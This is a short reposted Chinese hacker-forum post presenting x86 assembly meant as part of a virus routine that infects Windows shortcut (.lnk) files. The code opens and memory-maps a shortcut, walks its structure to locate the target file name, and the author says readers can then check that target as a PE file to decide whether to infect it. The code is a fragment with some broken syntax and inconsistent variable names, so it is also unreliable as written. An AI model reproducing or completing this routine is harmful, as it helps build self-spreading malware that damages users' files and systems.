[转载]一段感染快捷方式的简短汇编代码
信息来源:hackbase.com[code]push 0
push 80h
push 3
push 0
push 1
push 80000000h
lea eax,filename[ebx]
push eax
call _CreateFile[ebx
cmp eax,INVALID_HANDLE_VALUE
jz infect_lnk_exit
mov hFile,eax
push
0
push 0
push 0
push 2
push 0
push hFile[ebx]
call _CreateFileMapping[ebx]
or eax,eax
jz @1
mov
hMapping[ebx],eax
push 0
push 0
push 0
push 4
push hMapping[ebx]
call MapViewOfFile
or eax,eax
jz @2
mov
_pMapping[ebx],eax
mov
esi,pMapping
add
esi,4ch
movzx ecx,word ptr
[esi]
add
esi,2
add
esi,ecx
mov
ecx,[esi+10h]
add
esi,ecx[/code]
到这里esi就指向快捷方式所指向文件名的地址
后面大家就可以向平常判段PE文件的方法来确定要不要感染这个文件
以上都是我个人的见解应为我是个菜鸟有不对的地方请高手指出
页:
[1]